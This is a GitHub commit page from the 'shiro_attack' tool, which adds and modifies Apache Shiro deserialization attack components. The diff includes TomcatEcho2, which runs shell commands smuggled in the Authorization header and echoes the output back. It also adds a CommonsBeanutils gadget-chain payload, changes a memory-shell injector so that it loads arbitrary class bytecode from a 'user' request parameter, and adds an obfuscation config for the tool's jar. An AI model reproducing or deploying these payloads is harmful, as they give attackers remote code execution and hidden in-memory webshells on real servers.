Skip to content

Commit

Permalink
dy to user
Browse files Browse the repository at this point in the history
  • Loading branch information
@SummerSec
SummerSec committed Feb 18, 2022
1 parent 949917d commit 9c0c5c6
Show file tree
Hide file tree
Showing 17 changed files with 537 additions and 4 deletions.
8 changes: 6 additions & 2 deletions pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -236,7 +236,7 @@
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.13.3</version>
<version>2.14.1</version>
</dependency>
<dependency>
<groupId>com.arronlong</groupId>
Expand Down Expand Up @@ -300,7 +300,11 @@
<artifactId>hutool-all</artifactId>
<version>5.7.13</version>
</dependency>

<dependency>
<groupId>javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.12.0.GA</version>
</dependency>

</dependencies>

Expand Down
1 change: 1 addition & 0 deletions src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -77,6 +77,7 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N
" if (var3 != null && !var3.isEmpty()) {\n" +
" var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
" var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
// " var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Setcoolie\"), var3});\n" +
" var4 = true;\n" +
" }\n" +
"\n" +
Expand Down
128 changes: 128 additions & 0 deletions src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,128 @@
package com.summersec.attack.deser.echo;

import javassist.*;

import java.io.IOException;

/**
* @ClassName: TomcatEcho2
* @Description: TODO
* @Author: Summer
* @Date: 2022/1/19 11:33
* @Version: v1.0.0
* @Description:
**/
public class TomcatEcho2 implements EchoPayload{
@Override
public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException {
final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());
if (clazz.getDeclaredConstructors().length != 0) {
clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
}



clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n" +
" byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" +
" Object var2;\n" +
" Class var3;\n" +
" try {\n" +
" var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
" var2 = var3.newInstance();\n" +
" var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" +
" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
" } catch (Exception var5) {\n" +
" var3 = Class.forName(\"java.nio.ByteBuffer\");\n" +
" var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" +
" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
" } \n" +
" }",clazz));

clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n" +
" java.lang.reflect.Field var2 = null;\n" +
" Class var3 = var0.getClass();\n" +
"\n" +
" while(var3 != Object.class) {\n" +
" try {\n" +
" var2 = var3.getDeclaredField(var1);\n" +
" break;\n" +
" } catch (NoSuchFieldException var5) {\n" +
" var3 = var3.getSuperclass();\n" +
" }\n" +
" }\n" +
"\n" +
" if (var2 == null) {\n" +
" throw new NoSuchFieldException(var1);\n" +
" } else {\n" +
" var2.setAccessible(true);\n" +
" return var2.get(var0);\n" +
" }\n" +
" }", clazz));
clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" +
" boolean var4 = false;\n" +
" Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" +
" for (int var6 = 0; var6 < var5.length; ++var6) {\n" +
" Thread var7 = var5[var6];\n" +
" if (var7 != null) {\n" +
" String var3 = var7.getName();\n" +
" if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" +
" Object var1 = getFV(var7, \"target\");\n" +
" if (var1 instanceof Runnable) {\n" +
" try {\n" +
" var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" +
" } catch (Exception var13) {\n" +
" continue;\n" +
" }\n" +
" java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" +
"\n" +
" for(int var10 = 0; var10 < var9.size(); ++var10) {\n" +
" Object var11 = var9.get(var10);\n" +
" var1 = getFV(var11, \"req\");\n" +
" Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" +
" try {\n" +
"\n" +
"\n" +
" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" +
" if (var3 != null && !var3.isEmpty()) {\n" +
" var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
" var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
" var4 = true;\n" +
" }\n" +
"\n" +
" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" +
" if (var3 != null && !var3.isEmpty()) {\n" +
" var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" +
" String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" +
" writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" +
" var4 = true;\n" +
" }\n" +
"\n" +
" if (var4) {\n" +
" break;\n" +
" }\n" +
" }catch (Exception var14) {\n" +
" writeBody(var2, var14.getMessage().getBytes());\n" +
" }\n" +
" }\n" +
"\n" +
" if (var4) {\n" +
" break;\n" +
" }\n" +
" }\n" +
" }\n" +
" }\n" +
" }\n" +
" }",clazz));

return clazz;
}


public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException {
ClassPool pool = ClassPool.getDefault();
// TomcatEcho2 tomcatEcho2 = new TomcatEcho2();
SpringEcho springEcho = new SpringEcho();
springEcho.genPayload(pool);
// tomcatEcho2.genPayload(pool);
}
}
57 changes: 57 additions & 0 deletions src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
package com.summersec.attack.deser.payloads;

import com.summersec.attack.deser.payloads.annotation.Authors;
import com.summersec.attack.deser.payloads.annotation.Dependencies;
import com.summersec.attack.deser.util.JavassistClassLoader;
import com.summersec.attack.deser.util.Reflections;
import java.util.Comparator;
import java.util.PriorityQueue;
import java.util.Queue;

import com.summersec.attack.deser.util.StandardExecutorClassLoader;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtField;


@Dependencies({"commons-beanutils:commons-beanutils:1.6.1"})
@Authors({"phith0n"})
public class CommonsBeanutilsString_192s implements ObjectPayload<Queue<Object>> {
@Override
public Queue<Object> getObject(Object template) throws Exception {

ClassPool pool = ClassPool.getDefault();
pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
final CtClass beanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");

try {
CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID");
beanComparator.removeField(ctSUID);
}catch (javassist.NotFoundException e){}
beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator));
// mock method name until armed
final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance();
beanComparator.defrost();

PriorityQueue<String> queue = new PriorityQueue(2, (Comparator<?>)comparator);

queue.add("1");
queue.add("1");

Reflections.setFieldValue(queue, "queue", new Object[] { template, template });

Reflections.setFieldValue(beanComparator, "property", "outputProperties");

return (Queue)queue;
}

public static void main(String[] args) throws Exception {
CommonsBeanutilsString_192s commonsBeanutilsString192 = new CommonsBeanutilsString_192s();
commonsBeanutilsString192.getObject(new Object());

}
}



2 changes: 1 addition & 1 deletion src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@ public CtClass genPayload(ClassPool pool) throws Exception {
}
clazz.addMethod(CtMethod.make(" private static Object getFV(Object o, String s) throws Exception {\n java.lang.reflect.Field f = null;\n Class clazz = o.getClass();\n while (clazz != Object.class) {\n try {\n f = clazz.getDeclaredField(s);\n break;\n } catch (NoSuchFieldException e) {\n clazz = clazz.getSuperclass();\n }\n }\n if (f == null) {\n throw new NoSuchFieldException(s);\n }\n f.setAccessible(true);\n return f.get(o);\n}", clazz));

clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String dy = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n dy = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"dy\")});\n\n if (dy != null && !dy.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(dy);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz));
clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String user = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n user = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"user\")});\n\n if (user != null && !user.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(user);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz));

return clazz;
}
Expand Down
15 changes: 15 additions & 0 deletions src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
package com.summersec.attack.deser.util;

/**
* @ClassName: JavassistClassLoader
* @Description: TODO
* @Author: Summer
* @Date: 2022/1/24 16:34
* @Version: v1.0.0
* @Description:
**/
public class JavassistClassLoader extends ClassLoader {
public JavassistClassLoader(){
super(Thread.currentThread().getContextClassLoader());
}
}
3 changes: 2 additions & 1 deletion src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -39,10 +39,11 @@ private void loadResource(String version) {
// 加载对应版本目录下的 Jar 包
tryLoadJarInDir(jarPath);
// 加载对应版本目录下的 lib 目录下的 Jar 包
tryLoadJarInDir(jarPath + File.separator + "lib");
// tryLoadJarInDir(jarPath + File.separator + "lib");
}

private void tryLoadJarInDir(String dirPath) {
System.out.println("Try load jar in dir: " + dirPath);
File dir = new File(dirPath);
// 自动加载目录下的jar包
if (dir.exists() && dir.isDirectory()) {
Expand Down
34 changes: 34 additions & 0 deletions src/main/resources/allatori.xml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
<!--allatori配置文件-->
<config>
<!-- <!\-\- 输入和输出jar配置,out指向的是加密后的jar &ndash;&gt;-->
<input>
<!-- <jar in="shiro_attack-4.3-SNAPSHOT.jar" out="obf-shiro_attack-4.3-SNAPSHOT.jar"/>-->
<jar in="shiro_attack-4.4-SNAPSHOT-all.jar" out="obf-shiro_attack-4.4-SNAPSHOT-all.jar"/>
</input>
<!-- <!\-\- 加水印 &ndash;&gt;-->
<watermark key="shiro_attack" value="developer: SummerSec"/>
<!-- <!\-\- 需要保留原来类名的配置 &ndash;&gt;-->
<keep-names>
<class access="protected+">
<field access="protected+"/>
<method access="protected+"/>
</class>
<class template="class com.xxx.xxx.*"/>

</keep-names>

<property name="log-file" value="log.xml"/>
<ignore-classes>
<class template="class \*springframework\*"/>
<class template="class \*shardingjdbc\*"/>
<class template="class \*jni\*"/>
<class template="class \*alibaba\*"/>
<class template="class \*persistence\*"/>
<class template="class \*apache\*"/>
<class template="class \*mybatis\*"/>
<!-- <!\-\- 排除包下的类,可单个到具体,注意此处一定要排除掉springboot项目的启动类 &ndash;&gt;-->
<class template="class com.apache.*"/>
<class template="class org.apache.http.entity.StringEntity"/>
<class template="class org.apache.cxf.*"/>
</ignore-classes>
</config>

0 comments on commit 9c0c5c6

Please sign in to comment.